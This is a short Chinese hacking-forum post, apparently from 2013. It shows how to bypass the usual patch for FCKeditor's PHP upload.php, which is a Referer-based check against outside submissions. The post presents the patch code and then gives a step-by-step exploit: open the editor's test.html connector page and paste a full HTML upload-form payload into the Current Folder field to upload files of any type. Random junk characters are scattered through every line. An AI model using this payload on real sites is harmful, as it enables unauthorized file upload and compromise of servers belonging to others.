找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2360|回复: 0
打印 上一主题 下一主题

fckeditor 漏洞修复后的二次利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:12:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
4 K$ E# z) u; r* K+ V网上给出的修复方案是
# [% C! q3 B) E: I! n; |修复方法,删除FCK编辑器用其他的编辑器& L) Y7 W9 ?+ J5 I( L. G5 U
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
, `6 b7 `5 R" i! `  g在& K1 D' J8 \9 z1 a6 g/ q9 p/ _
require(‘config.php’);$ s/ ?6 |$ J$ i) p9 f* Q9 m
require(‘util.php’);
8 J/ Z' @! X, O0 ^; e1 K9 S的下面添加以下代码—————————–
' M) A- p' J  w2 e( M//防止外部提交
2 g+ U  E& @5 N7 b4 _  Ofunction outsidepost()4 P" d, T- G5 `4 U9 c3 O
{
$ ~5 O6 g& y1 S. J2 \$servername=$_SERVER['SERVER_NAME'];
2 X$ {( K* q" W4 C2 t; x8 j$sub_from=@$_SERVER['HTTP_REFERER'];
; }/ u) M: r1 }/ I4 G$sub_len=strlen($servername);# J6 p# a# a0 h* T
$checkfrom=substr($sub_from,7,$sub_len);
+ M4 s+ r: ^3 e! m) y2 ^if($checkfrom!=$servername){3 }* C5 t  A0 G* F& I" L
echo(“you don’t outsidepost!”);4 ~8 {0 l8 Y1 B6 r( c$ u2 k& I4 c
exit;' O  K/ a( W1 g$ O6 u
}
2 S) `+ V( w0 r) ^3 `3 L}
* u1 \% q9 z. E0 Ooutsidepost();& Y7 O0 S( Z( [7 N9 p4 H8 r3 h
防止外部提交,但是没有防止内部提交,; G3 M  }7 Q/ _: x6 P
利用方法:
% x0 K" _8 \  f7 G, A% s4 `1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
6 t+ d/ _3 g& b( F2,在Current Folder 框输入
  _3 c9 j+ j" M3 u* ~<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
  \# U7 `" b3 X" o' a9 m  b然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。9 l' z, @" O* u2 B- ?
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表